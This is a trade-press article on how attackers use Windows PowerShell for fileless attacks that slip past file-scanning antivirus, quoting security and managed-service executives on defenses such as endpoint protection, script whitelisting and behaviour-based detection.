POWERSHELL, Microsoft’s “automation platform and scripting language,” combines the ease of batch files with the power of a programming language to provide remote management able to handle almost every Windows computer issue. Built upon the .NET framework, PowerShell gives admins amazing access and control. Unfortunately, it also gives amazing access and control to attackers.
“If it’s easier for IT admins, it’s easier for attackers,” says Mike Viscuso, co-founder and CTO of Carbon Black Inc., a Waltham, Mass.-based international endpoint security provider with 750 employees and more than 3,000 customers worldwide. “Anti-virus protection has been focused on scanning new files for malware. A bunch of hackers have realized they can skip the effort of creating files that pass AV checks and just leverage PowerShell to do the same hacking jobs.”
Now 10 years old, PowerShell is part of Microsoft’s Windows Management Framework and is built into every Windows OS on computers and servers. Viscuso says, “Nearly every IT department uses PowerShell,” just like every MSP and reseller doing remote admin.
Using a typical attack chain such as spear phishing or malicious code on a website, attackers place their payload in the browser. From within the browser, malware can then start PowerShell on that system and execute commands. With no files to scan, typical AV programs can’t help. When attackers do use files, one technique is to hold those files in PowerShell RAM for execution, again bypassing AV scans.
Donald R. Howard, president and CTO of My IT Company, just west of Chicago, believes one customer’s ransomware attack might have been through PowerShell. “We tracked the sources of two attacks, but the third was different.” His team puts proper gateways in place and “we monitor the blogosphere to see what’s new,” he adds. He also notes that keeping up with scripting is critical. “It’s not like riding a bike.”
“Two macro trends make life easier for attackers,” says Viscuso. “Device mobility means more users are working outside the corporate walls, and security tools, than they used to. And critical work is done in the cloud now, sometimes from a laptop in Starbucks, ignoring requests to use a corporate VPN, which means your network security infrastructure can’t help protect you.”
The need for increased endpoint security, suggests Viscuso, is far greater than before. In addition, whitelisting PowerShell scripts based on deploying in a certain way or stored in a particular location can help. Block all script execution outside those rules.
AV tools based on program activity, rather than file scanning, can stop malicious PowerShell attacks. When that software sees suspicious activity, it can shut down the infected file or close PowerShell.
Image source: Microsoft